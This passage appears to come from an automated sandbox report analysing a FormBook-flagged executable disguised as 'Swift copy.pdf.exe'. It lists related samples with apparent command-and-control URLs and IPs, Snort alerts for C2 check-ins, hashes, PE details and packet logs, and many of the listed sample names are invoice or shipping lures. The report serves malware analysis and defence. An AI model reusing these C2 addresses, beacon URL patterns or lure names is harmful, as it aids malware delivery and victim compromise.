                                                                • legitville.com/0.html
                                                                PO #6093245.exeGet hashmaliciousBrowse
                                                                • www.hangerb2b.com/b3pu/?kzrxUJ=GjMT3ma6eBTmMZ6NkR6rAGiU/BiODhxWygShWLT6el36cGVGnI9xWiRL70JBWLvmfgjT&mBy=wZOTMdR8Z49L4
                                                                REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                • www.internationalsoccerteams.com/xxg/
                                                                PO_210223.exeGet hashmaliciousBrowse
                                                                • www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb
                                                                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                • www.bigias.com/dgn/?Yzrp=LfNQbftNF2CZK3Pdbvfs/GUpg4UhIVB9HREii+G/2FPSQnC/ZhagFrpEcGqY3PnsjIPUew==&Lzrl=k6fTBXMx9H
                                                                8nxKYwJna8.exeGet hashmaliciousBrowse
                                                                • www.wood-decor24.com/csv8/?UT=EhUhb4&OjKL3=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvp2wRjK1uE1w
                                                                win32.exeGet hashmaliciousBrowse
                                                                • www.buythinsecret.com/incn/?8pBP5p=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06IZ75j/ocR9F&L6Ah=2dSLFXghYtFd0
                                                                mitbjisfe.jsGet hashmaliciousBrowse
                                                                • urchintelemetry.com/
                                                                Details...exeGet hashmaliciousBrowse
                                                                • www.coolgadgetsdominate.com/t052/?pPX=6CpI00+2HCKGB1JbH22k369411uOsTuNarkGYMnsdTbHzEXKI/PSljtTQWzMzlp4SIHA&1b=jnKtRfexr
                                                                Fdj5vhj87S.exeGet hashmaliciousBrowse
                                                                • www.buythinsecret.com/incn/?2de=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06L5BpyfQG2cC&2dpxxT=i6MpbxRhTzX8wRbP

                                                                Domains

                                                                No context

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                CONFLUENCE-NETWORK-INCVGremittance info.xlsxGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                HG546092227865431209.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                0434 pdf.exeGet hashmaliciousBrowse
                                                                • 209.99.64.55
                                                                bank transfer.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                PO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                                                • 209.99.40.222
                                                                invoice.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                PO7321.exeGet hashmaliciousBrowse
                                                                • 208.91.197.39
                                                                PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                • 208.91.197.39
                                                                Lista e porosive te blerjes.exeGet hashmaliciousBrowse
                                                                • 209.99.64.33
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                Formbook.exeGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                bank details.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                PO#7689.zip.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                ORDER_PDF.exeGet hashmaliciousBrowse
                                                                • 209.99.64.18
                                                                IHNETUSXeros from condor.htmGet hashmaliciousBrowse
                                                                • 162.219.250.45
                                                                Xero from mashreqbank.htmGet hashmaliciousBrowse
                                                                • 162.219.250.45
                                                                Xero from livibank.htmGet hashmaliciousBrowse
                                                                • 162.219.248.137
                                                                REVIEW-UPDATE.htmGet hashmaliciousBrowse
                                                                • 162.219.248.247
                                                                Statement Of Account.exeGet hashmaliciousBrowse
                                                                • 174.136.28.105
                                                                AnGaRFyL4O.exeGet hashmaliciousBrowse
                                                                • 174.136.37.109
                                                                HOPEFUL.exeGet hashmaliciousBrowse
                                                                • 174.136.37.109
                                                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.med-unjfsc.edu.pe%2fbb%2fnorm%2findex.php%3femail%3dnora%40viaseating.com&c=E,1,2WnpuejHK0crRSiThceRweJRQbSUEEvJy7iF6FIK2UlyT26cZed-LlZlMl3yBgsrDzjyR7tOh2I_8NafFCWIHGw2IRCfeq1uFDRWNblrvxGbmE1p19ZMWzD7&typo=1Get hashmaliciousBrowse
                                                                • 162.219.251.117
                                                                ISLONlRQUM.exeGet hashmaliciousBrowse
                                                                • 174.136.37.109
                                                                SCksBAW7IP.exeGet hashmaliciousBrowse
                                                                • 174.136.29.143
                                                                Request for Quotation.bat.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                Payment.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                RFQ specification..exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                scan383909.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                Prt scr 7604.exeGet hashmaliciousBrowse
                                                                • 174.136.29.143
                                                                purchase order.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                https://www.oakcns.com/wp-content/form/cblpf13-000360331/Get hashmaliciousBrowse
                                                                • 174.136.29.208
                                                                Custom Design_Specifications.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                http://www.afcogecodata.com.demikeutuhan.com/?tty=(rick.cameron@cogecodata.com)Get hashmaliciousBrowse
                                                                • 72.34.46.201
                                                                Unesa 20 Order and Catalogue cfm.exeGet hashmaliciousBrowse
                                                                • 174.136.29.143
                                                                LINODE-APLinodeLLCUSmalware.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                zeD11Fztx8.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                • 45.56.127.45
                                                                gunzipped.exeGet hashmaliciousBrowse
                                                                • 45.56.119.148
                                                                frox0cheats.exeGet hashmaliciousBrowse
                                                                • 176.58.123.25
                                                                nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                                • 172.104.164.58
                                                                OfficeConsultPlugin.exeGet hashmaliciousBrowse
                                                                • 109.237.24.104
                                                                RFQ#798606.exeGet hashmaliciousBrowse
                                                                • 45.56.119.148
                                                                Private doc.docmGet hashmaliciousBrowse
                                                                • 109.237.24.104
                                                                lK8vF3n2e7.exeGet hashmaliciousBrowse
                                                                • 172.104.233.225
                                                                newordermx.exeGet hashmaliciousBrowse
                                                                • 45.33.2.79
                                                                sample.exeGet hashmaliciousBrowse
                                                                • 66.228.32.51
                                                                BnJvVt951o.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                BnJvVt951o.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                SMtbg7yHyR.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                9fdUNaHzLv.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                Private doc.docmGet hashmaliciousBrowse
                                                                • 212.71.251.238
                                                                invoice_document.docmGet hashmaliciousBrowse
                                                                • 212.71.251.238
                                                                sample.exe.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                Document_Opener.exe.14.exeGet hashmaliciousBrowse
                                                                • 88.80.186.210

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift copy.pdf.exe.log
                                                                Process:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1314
                                                                Entropy (8bit):5.350128552078965
                                                                Encrypted:false
                                                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.760448355080477
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:Swift copy.pdf.exe
                                                                File size:846848
                                                                MD5:5946d0ee4becb515a1cf39ef3f3dde56
                                                                SHA1:3321193ab8c09ab1098d8104afd021145eca89c3
                                                                SHA256:2e2c3bd3883976fc398bc30cadaa16043e792861e7b12db344cd285375df8605
                                                                SHA512:426b9cf314fbb2e97ce6b0a32a715e96b669435743a04403f4be8006c4e0d50ea038ea3d689d43216fe8a1fdb60e780395856506869b13a8cf2f2570b39d3748
                                                                SSDEEP:12288:g7Z5LlLscvSGSaabV/HhLaeOYeEKJgUNdaxRPWId1u2KudAA:g7Z5tdqGSamV/BLa3YBQpIdQMA
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..Z...........y... ........@.. .......................@............@................................

                                                                File Icon

                                                                Icon Hash:6eecccccd6d2f2f2

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4b798e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x607393D5 [Mon Apr 12 00:27:01 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb793c0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x18cb0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000xb59940xb5a00False0.955060650379data7.95048824536IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xb80000x18cb00x18e00False0.147240106784data4.33709757552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xd20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_ICON0xb81f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0xba7980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0xbb8400x468GLS_BINARY_LSB_FIRST
                                                                RT_ICON0xbbca80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                RT_ICON0xbfed00x10828dBase III DBT, version number 0, next free block index 40
                                                                RT_GROUP_ICON0xd06f80x4cdata
                                                                RT_VERSION0xd07440x37edata
                                                                RT_MANIFEST0xd0ac40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightCopyright 2012
                                                                Assembly Version8.1.1.15
                                                                InternalNameDefaultDecoder.exe
                                                                FileVersion8.1.1.14
                                                                CompanyNameLandskip Yard Care
                                                                LegalTrademarksA++
                                                                Comments
                                                                ProductNameLevelActivator
                                                                ProductVersion8.1.1.14
                                                                FileDescriptionLevelActivator
                                                                OriginalFilenameDefaultDecoder.exe

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                04/12/21-09:14:18.225439ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.260348ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                04/12/21-09:14:18.261599ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.296841ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                                                04/12/21-09:14:18.297228ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.343108ICMP449ICMP Time-To-Live Exceeded in Transit81.95.2.138192.168.2.6
                                                                04/12/21-09:14:18.365600ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.416953ICMP449ICMP Time-To-Live Exceeded in Transit151.139.80.6192.168.2.6
                                                                04/12/21-09:14:18.417375ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.467174ICMP449ICMP Time-To-Live Exceeded in Transit151.139.80.13192.168.2.6
                                                                04/12/21-09:14:18.467592ICMP384ICMP PING192.168.2.6205.185.216.42
                                                                04/12/21-09:14:18.517415ICMP408ICMP Echo Reply205.185.216.42192.168.2.6
                                                                04/12/21-09:15:16.607167TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.634.102.136.180
                                                                04/12/21-09:15:16.607167TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.634.102.136.180
                                                                04/12/21-09:15:16.607167TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.634.102.136.180
                                                                04/12/21-09:15:16.906033TCP1201ATTACK-RESPONSES 403 Forbidden804972634.102.136.180192.168.2.6
                                                                04/12/21-09:15:46.929966ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:15:49.942047ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:15:55.942216ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:08.022386ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:10.229217TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.651.222.80.112
                                                                04/12/21-09:16:10.229217TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.651.222.80.112
                                                                04/12/21-09:16:10.229217TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.651.222.80.112
                                                                04/12/21-09:16:11.838430ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:17.838594ICMP399ICMP Destination Unreachable Host Unreachable212.107.37.82192.168.2.6
                                                                04/12/21-09:16:27.838107TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6184.168.131.241
                                                                04/12/21-09:16:27.838107TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6184.168.131.241
                                                                04/12/21-09:16:27.838107TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.6184.168.131.241

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:15:16.565964937 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.606894016 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.607017040 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.607167006 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.647965908 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.906033039 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.906054974 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:16.906196117 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.906352043 CEST4972680192.168.2.634.102.136.180
                                                                Apr 12, 2021 09:15:16.947201967 CEST804972634.102.136.180192.168.2.6
                                                                Apr 12, 2021 09:15:21.997786999 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.197026968 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.197145939 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.197308064 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.396677971 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406625032 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406703949 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406725883 CEST804973345.33.51.100192.168.2.6
                                                                Apr 12, 2021 09:15:22.406811953 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:22.406852007 CEST4973380192.168.2.645.33.51.100
                                                                Apr 12, 2021 09:15:27.502224922 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.664932013 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.665126085 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.665319920 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.827898979 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.830058098 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.830075979 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:27.830271006 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.830358982 CEST4973980192.168.2.674.208.236.87
                                                                Apr 12, 2021 09:15:27.992778063 CEST804973974.208.236.87192.168.2.6
                                                                Apr 12, 2021 09:15:43.861591101 CEST4974380192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:15:46.872848988 CEST4974380192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:15:52.873462915 CEST4974380192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:05.763292074 CEST4975180192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:08.768917084 CEST4975180192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:10.091120005 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.228965044 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.229063034 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.229217052 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.367069006 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.371033907 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.371071100 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:10.371254921 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.371299028 CEST4975380192.168.2.651.222.80.112
                                                                Apr 12, 2021 09:16:10.509213924 CEST804975351.222.80.112192.168.2.6
                                                                Apr 12, 2021 09:16:14.769475937 CEST4975180192.168.2.65.101.123.53
                                                                Apr 12, 2021 09:16:15.694030046 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:15.850231886 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:15.850405931 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:15.850569963 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:16.006973028 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:16.670311928 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:16.866112947 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:20.034461975 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:20.034662008 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:20.035146952 CEST8049754174.136.25.55192.168.2.6
                                                                Apr 12, 2021 09:16:20.035238981 CEST4975480192.168.2.6174.136.25.55
                                                                Apr 12, 2021 09:16:21.878675938 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.040747881 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.040910006 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.041131020 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.203203917 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.350006104 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.350049019 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.350191116 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.471978903 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.512464046 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.512500048 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.512609959 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.536017895 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.674876928 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.674916983 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.674937010 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.674953938 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.675086021 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.675159931 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.798643112 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.798738956 CEST4975580192.168.2.6204.11.56.48
                                                                Apr 12, 2021 09:16:22.837121964 CEST8049755204.11.56.48192.168.2.6
                                                                Apr 12, 2021 09:16:22.837205887 CEST4975580192.168.2.6204.11.56.48

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:14:10.686942101 CEST5837753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:10.758783102 CEST53583778.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:10.799158096 CEST5507453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:10.847758055 CEST53550748.8.8.8192.168.2.6
